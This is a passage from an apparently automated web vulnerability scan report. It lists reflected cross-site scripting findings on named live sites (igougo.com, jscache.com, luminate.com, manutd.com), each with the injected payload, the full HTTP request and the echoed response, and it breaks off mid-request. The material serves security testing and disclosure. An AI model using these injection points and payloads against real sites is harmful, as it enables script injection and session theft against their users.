Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: SL_UVId=2BC47C1462303C7A;path=/;
X-SL-CompState: TouchUp
X-Strangeloop: ViewState,Compression
Content-Length: 78350


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!-- Google Website Optimizer Control Script -->
<script
...[SNIP]...
<base href="http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=160d36"style="x:expression(alert(1))"095b2ea4122&end=Boston&rm=1&dest=Boston, undefined undefined&strtDate=10/04/2011&endDate=10/07/2011" />
...[SNIP]...

4.331. http://www.igougo.com/traveldeals/ratefinder.aspx [dest parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.igougo.com
Path:   /traveldeals/ratefinder.aspx

Issue detail

The value of the dest request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8362"style%3d"x%3aexpression(alert(1))"1d1fbdf009e was submitted in the dest parameter. This input was echoed as f8362"style="x:expression(alert(1))"1d1fbdf009e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Boston&rm=1&dest=Boston,%20undefined%20undefinedf8362"style%3d"x%3aexpression(alert(1))"1d1fbdf009e&strtDate=10/04/2011&endDate=10/07/2011 HTTP/1.1
Host: www.igougo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 00:34:09 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: SL_UVId=2BC47C1462303C7A;path=/;
X-SL-CompState: TouchUp
X-Strangeloop: ViewState,Compression
Content-Length: 78353


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!-- Google Website Optimizer Control Script -->
<script
...[SNIP]...
<base href="http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Boston&rm=1&dest=Boston, undefined undefinedf8362"style="x:expression(alert(1))"1d1fbdf009e&strtDate=10/04/2011&endDate=10/07/2011" />
...[SNIP]...

4.332. http://www.igougo.com/traveldeals/ratefinder.aspx [end parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.igougo.com
Path:   /traveldeals/ratefinder.aspx

Issue detail

The value of the end request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 525cb"style%3d"x%3aexpression(alert(1))"c40f94a9b10 was submitted in the end parameter. This input was echoed as 525cb"style="x:expression(alert(1))"c40f94a9b10 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Boston525cb"style%3d"x%3aexpression(alert(1))"c40f94a9b10&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011 HTTP/1.1
Host: www.igougo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 02 Oct 2011 23:45:58 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: SL_UVId=2BC47C1462303C7A;path=/;
X-SL-CompState: TouchUp
X-Strangeloop: ViewState,Compression
Content-Length: 80383


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!-- Google Website Optimizer Control Script -->
<script
...[SNIP]...
<base href="http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Boston525cb"style="x:expression(alert(1))"c40f94a9b10&rm=1&dest=Boston, undefined undefined&strtDate=10/04/2011&endDate=10/07/2011" />
...[SNIP]...

4.333. http://www.igougo.com/traveldeals/ratefinder.aspx [end parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.igougo.com
Path:   /traveldeals/ratefinder.aspx

Issue detail

The value of the end request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d123a'%3balert(1)//08fa278eb24 was submitted in the end parameter. This input was echoed as d123a';alert(1)//08fa278eb24 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Bostond123a'%3balert(1)//08fa278eb24&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011 HTTP/1.1
Host: www.igougo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 02 Oct 2011 23:46:02 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: SL_UVId=2BC47C1462303C7A;path=/;
X-SL-CompState: TouchUp
X-Strangeloop: ViewState,Compression
Content-Length: 80289


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!-- Google Website Optimizer Control Script -->
<script
...[SNIP]...
tal;
google_safe = 'high';
google_ad_type = 'text';
google_color_line = 'ffffff';
google_adtest = 'off';
google_hints = 'Hotels Bostond123a';alert(1)//08fa278eb24';
google_encoding = 'iso-8859-1';
google_ad_channel = '2896345880';
}
function createGoogleAdsLink(pGoogleAdsVars) {
var oLink = document.creat
...[SNIP]...

4.334. http://www.igougo.com/traveldeals/ratefinder.aspx [endDate parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.igougo.com
Path:   /traveldeals/ratefinder.aspx

Issue detail

The value of the endDate request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4645f"style%3d"x%3aexpression(alert(1))"0e074ed26d1 was submitted in the endDate parameter. This input was echoed as 4645f"style="x:expression(alert(1))"0e074ed26d1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Boston&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/20114645f"style%3d"x%3aexpression(alert(1))"0e074ed26d1 HTTP/1.1
Host: www.igougo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 00:36:09 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: SL_UVId=2BC47C1462303C7A;path=/;
X-SL-CompState: TouchUp
X-Strangeloop: ViewState,Compression
Content-Length: 78353


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!-- Google Website Optimizer Control Script -->
<script
...[SNIP]...
<base href="http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Boston&rm=1&dest=Boston, undefined undefined&strtDate=10/04/2011&endDate=10/07/20114645f"style="x:expression(alert(1))"0e074ed26d1" />
...[SNIP]...

4.335. http://www.igougo.com/traveldeals/ratefinder.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.igougo.com
Path:   /traveldeals/ratefinder.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 848f0"style%3d"x%3aexpression(alert(1))"b28791311ee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 848f0"style="x:expression(alert(1))"b28791311ee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Boston&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011&848f0"style%3d"x%3aexpression(alert(1))"b28791311ee=1 HTTP/1.1
Host: www.igougo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 00:52:45 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: SL_UVId=2BC47C1462303C7A;path=/;
X-SL-CompState: TouchUp
X-Strangeloop: ViewState,Compression
Content-Length: 78363


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!-- Google Website Optimizer Control Script -->
<script
...[SNIP]...
<base href="http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Boston&rm=1&dest=Boston, undefined undefined&strtDate=10/04/2011&endDate=10/07/2011&848f0"style="x:expression(alert(1))"b28791311ee=1" />
...[SNIP]...

4.336. http://www.igougo.com/traveldeals/ratefinder.aspx [rm parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.igougo.com
Path:   /traveldeals/ratefinder.aspx

Issue detail

The value of the rm request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49a27"style%3d"x%3aexpression(alert(1))"5516cdaaee2 was submitted in the rm parameter. This input was echoed as 49a27"style="x:expression(alert(1))"5516cdaaee2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Boston&rm=149a27"style%3d"x%3aexpression(alert(1))"5516cdaaee2&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011 HTTP/1.1
Host: www.igougo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 00:33:14 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: SL_UVId=2BC47C1462303C7A;path=/;
X-SL-CompState: TouchUp
X-Strangeloop: ViewState,Compression
Content-Length: 78353


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!-- Google Website Optimizer Control Script -->
<script
...[SNIP]...
<base href="http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Boston&rm=149a27"style="x:expression(alert(1))"5516cdaaee2&dest=Boston, undefined undefined&strtDate=10/04/2011&endDate=10/07/2011" />
...[SNIP]...

4.337. http://www.igougo.com/traveldeals/ratefinder.aspx [strtDate parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.igougo.com
Path:   /traveldeals/ratefinder.aspx

Issue detail

The value of the strtDate request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40323"style%3d"x%3aexpression(alert(1))"4d993816bbe was submitted in the strtDate parameter. This input was echoed as 40323"style="x:expression(alert(1))"4d993816bbe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Boston&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/201140323"style%3d"x%3aexpression(alert(1))"4d993816bbe&endDate=10/07/2011 HTTP/1.1
Host: www.igougo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 00:50:43 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: SL_UVId=2BC47C1462303C7A;path=/;
X-SL-CompState: TouchUp
X-Strangeloop: ViewState,Compression
Content-Length: 78353


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!-- Google Website Optimizer Control Script -->
<script
...[SNIP]...
<base href="http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Boston&rm=1&dest=Boston, undefined undefined&strtDate=10/04/201140323"style="x:expression(alert(1))"4d993816bbe&endDate=10/07/2011" />
...[SNIP]...

4.338. http://www.jscache.com/weimg [itype parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.jscache.com
Path:   /weimg

Issue detail

The value of the itype request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c224c'%3balert(1)//00a1bd292f3 was submitted in the itype parameter. This input was echoed as c224c';alert(1)//00a1bd292f3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /weimg?itype=langs/en/tripadvisor_logo_207x51-12811-0.gifc224c'%3balert(1)//00a1bd292f3&lang=en HTTP/1.1
Host: www.jscache.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.getaroom.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 193
Content-Type: application/x-javascript;charset=UTF-8
Expires: Mon, 03 Oct 2011 00:38:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 00:38:47 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: TATravelInfo=V2*A.2*MG.-1*HP.2*FL.3; Domain=.tripadvisor.com; Expires=Thu, 30-Sep-2021 00:38:47 GMT; Path=/
Set-Cookie: TASession=%1%V2ID.BC649BA2FF72A3D5B3A8EB2418B261B6*SQ.15*LS.weimg*GR.43*TCPAR.79*TBR.64*EXEX.37*ABTR.55*PPRP.72*PHTB.89*FS.52*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*TFT.3*DF.0*FP.%2Fweimg%3Flang%3Den%26itype%3Dlangs%252Fen%252Ftripadvisor_logo_207x51-12811-0%5C.gif*RP.http%3A%2F%2Fwww%5C.getaroom%5C.com%2F*LP.%2Fweimg%3Flang%3Den%26itype%3Dlangs%252Fen%252Ftripadvisor_logo_207x51-12811-0%5C.gif*FS.32*TRA.true; Domain=.tripadvisor.com; Path=/
Set-Cookie: ServerPool=A; Domain=.tripadvisor.com; Path=/

document.write( '<img src="http://www.tripadvisor.com/img/cdsi/langs/en/tripadvisor_logo_207x51-12811-0.gifc224c';alert(1)//00a1bd292f3" style="border:none; margin:0;" alt=" TripAdvisor"/>' );

4.339. http://www.luminate.com/widget/v3/53d1ac1014/event/1230a958301-1/taskbar/minimized/ [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.luminate.com
Path:   /widget/v3/53d1ac1014/event/1230a958301-1/taskbar/minimized/

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 8f20f<script>alert(1)</script>9c80d39f6d9 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /widget/v3/53d1ac1014/event/1230a958301-1/taskbar/minimized/?callback=jQuery152021032119542360306_13175999542938f20f<script>alert(1)</script>9c80d39f6d9&config_id=fdc910141b&mid=pJOb9VieN0ruJlEHp5PmCA&_=1317599964039 HTTP/1.1
Host: www.luminate.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: shoptube_id=f6d10bcb0c

Response

HTTP/1.0 200 OK
Date: Mon, 03 Oct 2011 00:00:51 GMT
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI NID DEVa PSAa PSDa OUR OTR IND OTC"
Content-Type: application/javascript
Cache-Control: no-cache, no-store, private
Vary: Accept-Encoding
X-Cache: MISS from lb4-sv.int.pixazza.com
X-Cache-Lookup: MISS from lb4-sv.int.pixazza.com:80
Via: 1.0 lb4-sv.int.pixazza.com:80 (squid/2.6.STABLE18)
Connection: Keep-Alive

jQuery152021032119542360306_13175999542938f20f<script>alert(1)</script>9c80d39f6d9({"result": "success"});

4.340. http://www.luminate.com/widget/v3/metadata/ [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.luminate.com
Path:   /widget/v3/metadata/

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 454e8<script>alert(1)</script>680fca9efa2 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /widget/v3/metadata/?callback=$lmn8_metadata1454e8<script>alert(1)</script>680fca9efa2&width=570&height=355&idx=1&url=http%3A%2F%2Fu.goal.com%2F136200%2F136214hp2.jpg&publisher_id=53d1ac1014&title=Sir+Alex+and+Anderson-Manchester+United&modules=taskbar%2Cemail%2Cfacebook%2Ctwitter%2Cburma%2Cflipstats%2Cproducts&_cc=US HTTP/1.1
Host: www.luminate.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: shoptube_id=f6d10bcb0c

Response

HTTP/1.0 200 OK
Date: Mon, 03 Oct 2011 00:00:59 GMT
Server: Apache
Cache-Control: max-age=1800
Expires: Mon, 03 Oct 2011 00:30:59 GMT
X-Pixazza-Pict-ID: 1230a958301
X-Pixazza-Campaign-ID: 99ab10c867
X-Pixazza-Shopped: false
P3P: policyref="/w3c/p3p.xml", CP="NOI NID DEVa PSAa PSDa OUR OTR IND OTC"
Content-Type: application/javascript
Vary: Accept-Encoding
X-Cache: MISS from lb1-sv.int.pixazza.com
X-Cache-Lookup: MISS from lb1-sv.int.pixazza.com:80
Via: 1.0 lb1-sv.int.pixazza.com:80 (squid/2.6.STABLE18)
Connection: Keep-Alive

$lmn8_metadata1454e8<script>alert(1)</script>680fca9efa2({"data": {"burma": {"metadata": {"hints": "soccer sports football", "channelID": "1000000476", "network": "adsense", "accountID": "2540be4033"}}, "twitter": {"metadata": {}}, "flipstats": {"metadata":
...[SNIP]...

4.341. http://www.luminate.com/widget/v3/metadata/ [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.luminate.com
Path:   /widget/v3/metadata/

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload f0346<script>alert(1)</script>38991e8f777 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /widget/v3/metadata/?callback=$lmn8_metadata1&width=570&height=355&idx=1&url=http%3A%2F%2Fu.goal.com%2F136200%2F136214hp2.jpgf0346<script>alert(1)</script>38991e8f777&publisher_id=53d1ac1014&title=Sir+Alex+and+Anderson-Manchester+United&modules=taskbar%2Cemail%2Cfacebook%2Ctwitter%2Cburma%2Cflipstats%2Cproducts&_cc=US HTTP/1.1
Host: www.luminate.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: shoptube_id=f6d10bcb0c

Response

HTTP/1.0 200 OK
Date: Mon, 03 Oct 2011 00:01:04 GMT
Server: Apache
Cache-Control: max-age=1800
Expires: Mon, 03 Oct 2011 00:31:04 GMT
X-Pixazza-Campaign-ID: 99ab10c867
X-Pixazza-Shopped: false
P3P: policyref="/w3c/p3p.xml", CP="NOI NID DEVa PSAa PSDa OUR OTR IND OTC"
Content-Type: application/javascript
Vary: Accept-Encoding
X-Cache: MISS from lb5-sv.int.pixazza.com
X-Cache-Lookup: MISS from lb5-sv.int.pixazza.com:80
Via: 1.0 lb5-sv.int.pixazza.com:80 (squid/2.6.STABLE18)
Connection: Keep-Alive

$lmn8_metadata1({"data": {"burma": {"metadata": {"accountID": "2540be4033", "channelID": "1000000476", "network": "adsense", "hints": "soccer sports football"}}, "products": {"metadata": {"data": {"targets": []}}}, "twitter": {"metadata": {}}, "image": {"uid": "-3b9b3273-1", "idx": 1, "title": "Sir Alex and Anderson-Manchester United", "url": "http://u.goal.com/136200/136214hp2.jpgf0346<script>alert(1)</script>38991e8f777", "celebrities": [], "mid": "S8RL5TZZ.FoRMxSnMY3wHC", "height": 355, "width": 570, "canonical": "http://u.goal.com/136200/136214hp2.jpgf0346<script>
...[SNIP]...

4.342. http://www.manutd.com/One-United/Login.aspx [redirectPath parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manutd.com
Path:   /One-United/Login.aspx

Issue detail

The value of the redirectPath request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d6e4"><script>alert(1)</script>e66d79da26b was submitted in the redirectPath parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /One-United/Login.aspx?redirectPath=/en/Fanzone/Competition-And-Polls/Competition.aspx?id={A04F2C18-1A4F-437D-B2BF-26E32C2683B7}4d6e4"><script>alert(1)</script>e66d79da26b&regmode=full HTTP/1.1
Host: www.manutd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.manutd.com/en/Fanzone/Competition-And-Polls.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
